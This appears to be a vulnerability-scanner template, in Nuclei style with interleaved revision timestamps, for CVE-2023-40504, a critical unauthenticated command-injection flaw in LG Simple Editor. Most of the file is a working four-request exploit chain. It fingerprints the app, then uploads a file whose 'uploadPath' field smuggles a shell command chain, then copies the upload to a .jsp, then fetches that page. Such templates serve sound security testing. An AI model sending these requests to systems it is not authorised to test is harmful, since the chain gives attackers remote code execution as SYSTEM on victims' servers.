2024-08-19 19:16:43 +00:00
id : CVE-2023-40504
info :
name : LG Simple Editor <= v3.21.0 - Command Injection
author : s4e-io
severity : critical
description : |
LG Simple Editor readVideoInfo Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of LG Simple Editor. Authentication is not required to exploit this vulnerability. The specific flaw exists within the readVideoInfo method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.
reference :
- https://www.zerodayinitiative.com/advisories/ZDI-23-1208/
- https://packetstormsecurity.com/files/180171/LG-Simple-Editor-3.21.0-Command-Injection.html
- https://0day.today/exploit/39719
- https://www.usom.gov.tr/bildirim/tr-24-0417
2024-08-20 17:21:01 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-40504
2024-08-19 19:16:43 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-40504
cwe-id : CWE-78
epss-score : 0.00094
epss-percentile : 0.40471
metadata :
max-request : 1
2024-08-20 17:21:01 +00:00
verified : true
2024-08-19 19:16:43 +00:00
vendor : lg
product : simple_editor
fofa-query : icon_hash="159985907"
2024-08-20 17:21:01 +00:00
tags : cve,cve2023,lg,simple-editor,intrusive,rce,file-upload
2024-08-19 19:16:43 +00:00
variables :
filename : "{{rand_base(12)}}"
flow : http(1) && http(2) && http(3) && http(4)
http :
- raw :
- |
GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'contains(body,"LG Simple Editor")'
- 'status_code == 200'
condition : and
internal : true
- raw :
- |
POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition : form-data; name="uploadVideo"; filename="{{filename}}.bmp"
/
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition : form-data; name="uploadPath"
/"&cmd&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del {{filename}}.bmp&/../"
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition : form-data; name="uploadFile_x"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition : form-data; name="uploadFile_width"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition : form-data; name="uploadFile_height"
1
------WebKitFormBoundary7MA4YWxkTrZu0gW--
matchers :
- type : dsl
dsl :
2024-08-20 17:21:01 +00:00
- 'contains_all(body, "errorCode","errorMessage","fail")'
- 'contains(content_type, "application/json")'
2024-08-19 19:16:43 +00:00
- 'status_code == 200'
condition : and
internal : true
- raw :
- |
POST /simpleeditor/fileSystem/makeDetailContent.do HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
Accept : application/json
{"command" : "cp" , "option" : "-f" , "srcPath" : "/{{filename}}_original.bmp" , "destPath" : "/{{filename}}.jsp" }
matchers :
- type : dsl
dsl :
2024-08-20 17:21:01 +00:00
- 'contains_all(body, "errorCode","errorMessage","data","success")'
- 'contains(content_type, "application/json")'
2024-08-19 19:16:43 +00:00
- 'status_code == 200'
condition : and
internal : true
- raw :
- |
GET /simpleeditor/{{filename}}.jsp HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
2024-08-20 17:21:01 +00:00
- 'contains(content_type, "text/html")'
2024-08-19 19:16:43 +00:00
- 'status_code == 200'
condition : and
2024-08-21 16:48:24 +00:00
# digest: 490a004630440220238d6c4b173876bdd11be552ce064e6ea86a408459fccc901d1529e02d5a73ec0220099ad07f51609f948f410c4293a172cb6831ca2f0b359658c9a5f62714ae552e:922c64590222798bb761d5b6d8e72950